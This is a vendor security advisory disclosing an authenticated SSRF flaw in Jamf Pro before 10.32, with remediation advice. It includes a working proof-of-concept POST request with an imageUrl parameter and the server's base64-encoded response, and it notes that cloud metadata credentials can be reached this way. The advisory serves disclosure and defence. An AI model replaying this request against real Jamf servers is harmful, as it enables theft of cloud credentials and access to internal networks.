Nov 30, 2021
Jamf Pro before version 10.32 is vulnerable to a server-side request forgery vulnerability, that allows attackers to request arbitrary URLs and read the full HTTP response for these requests. This vulnerability is only exploitable after an attacker has authenticated to the Jamf Pro instance. On cloud environments such as AWS, this poses a greater risk as an attacker can potentially obtain AWS credentials via the metadata IP address.
An attacker can request arbitrary URLs on behalf of the Jamf Pro server. This could allow an attacker to pivot to the internal network and/or request cloud metadata endpoints to obtain cloud credentials. As Jamf Pro is often deployed on-premise within an internal network, this vulnerability exposes this internal network to authenticated Jamf Pro users.
Jamf Pro before version 10.32.
Jamf Pro is an application used by system administrators to configure and automate IT administration tasks for macOS, iOS, iPadOS, and tvOS devices. Jamf offers on-premises and cloud-based mobile device management.
This vulnerability was patched in Jamf 10.32.
Please find the detail about this Jamf release here: https://community.jamf.com/t5/jamf-pro/what-s-new-in-jamf-pro-10-32-release/m-p/246505.
In order to remediate this vulnerability, we recommend upgrading to the latest version of Jamf Pro on premise.
http://yourjamfinstance:8090/eduFeatureSettingsTest.html
The following HTTP request can be made to reproduce this issue, once authenticated to Jamf:
POST /eduFeatureSettingsTest.ajax?id=0&o=r HTTP/1.1
Host: jamfpro:8080
Content-Length: 117
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://re.local:8090
Referer: http://re.local:8090/legacy/eduFeatureSettingsTest.html?id=0&o=r
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=NGQwZDlkODQtZmY4MS00NjI3LTk5MGUtODA1MDg0NmRhZmY4
Connection: close
imageUrl=http%3A%2F%2Fexample.com&ajaxAction=ACTION_AJAX_REQUEST_PHOTO&session-token=dQcHUw2h9CF1QvoG5Q6lqBLawNEsxPuu
The full HTTP response for the requested URL can be found in the base64Image
XML tag, from the response of the Jamf Server:
HTTP/1.1 200
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
sessionExpiresEpoch: 1800
Date: Tue, 17 Aug 2021 13:09:14 GMT
Connection: close
Content-Length: 1959
<?xml version="1.0" encoding="UTF-8"?><jss>
<base64Image>PCFkb2N0eXBlIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDx0aXRsZT5FeGFtcGxlIERvbWFpbjwvdGl0bGU+CgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiIC8+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MSIgLz4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICBib2R5IHsKICAgICAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjZjBmMGYyOwogICAgICAgIG1hcmdpbjogMDsKICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgIGZvbnQtZmFtaWx5OiAtYXBwbGUtc3lzdGVtLCBzeXN0ZW0tdWksIEJsaW5rTWFjU3lzdGVtRm9udCwgIlNlZ29lIFVJIiwgIk9wZW4gU2FucyIsICJIZWx2ZXRpY2EgTmV1ZSIsIEhlbHZldGljYSwgQXJpYWwsIHNhbnMtc2VyaWY7CiAgICAgICAgCiAgICB9CiAgICBkaXYgewogICAgICAgIHdpZHRoOiA2MDBweDsKICAgICAgICBtYXJnaW46IDVlbSBhdXRvOwogICAgICAgIHBhZGRpbmc6IDJlbTsKICAgICAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjZmRmZGZmOwogICAgICAgIGJvcmRlci1yYWRpdXM6IDAuNWVtOwogICAgICAgIGJveC1zaGFkb3c6IDJweCAzcHggN3B4IDJweCByZ2JhKDAsMCwwLDAuMDIpOwogICAgfQogICAgYTpsaW5rLCBhOnZpc2l0ZWQgewogICAgICAgIGNvbG9yOiAjMzg0ODhmOwogICAgICAgIHRleHQtZGVjb3JhdGlvbjogbm9uZTsKICAgIH0KICAgIEBtZWRpYSAobWF4LXdpZHRoOiA3MDBweCkgewogICAgICAgIGRpdiB7CiAgICAgICAgICAgIG1hcmdpbjogMCBhdXRvOwogICAgICAgICAgICB3aWR0aDogYXV0bzsKICAgICAgICB9CiAgICB9CiAgICA8L3N0eWxlPiAgICAKPC9oZWFkPgoKPGJvZHk+CjxkaXY+CiAgICA8aDE+RXhhbXBsZSBEb21haW48L2gxPgogICAgPHA+VGhpcyBkb21haW4gaXMgZm9yIHVzZSBpbiBpbGx1c3RyYXRpdmUgZXhhbXBsZXMgaW4gZG9jdW1lbnRzLiBZb3UgbWF5IHVzZSB0aGlzCiAgICBkb21haW4gaW4gbGl0ZXJhdHVyZSB3aXRob3V0IHByaW9yIGNvb3JkaW5hdGlvbiBvciBhc2tpbmcgZm9yIHBlcm1pc3Npb24uPC9wPgogICAgPHA+PGEgaHJlZj0iaHR0cHM6Ly93d3cuaWFuYS5vcmcvZG9tYWlucy9leGFtcGxlIj5Nb3JlIGluZm9ybWF0aW9uLi4uPC9hPjwvcD4KPC9kaXY+CjwvYm9keT4KPC9odG1sPgo=</base64Image>
<ERRORS>
<ERROR>
<ERROR_FIELD>base64Image</ERROR_FIELD>
<ERROR_TEXT>The distribution point URL should begin with "https://"</ERROR_TEXT>
</ERROR>
</ERRORS>
<sessionExpiresEpoch>1800</sessionExpiresEpoch>
</jss>
Upon decoding the Base64, the full contents of the request to http://example.com
is returned:
<!doctype html>
<html>
<head>
<title>Example Domain</title>
... ommitted for brevity ...
The blog post detailing the steps taken for the discovery of this vulnerability can be found here.
Assetnote Security Research Team
Find out how Assetnote can help you lock down your external attack surface.
Use the lead form below, or alternatively contact us via email by clicking here.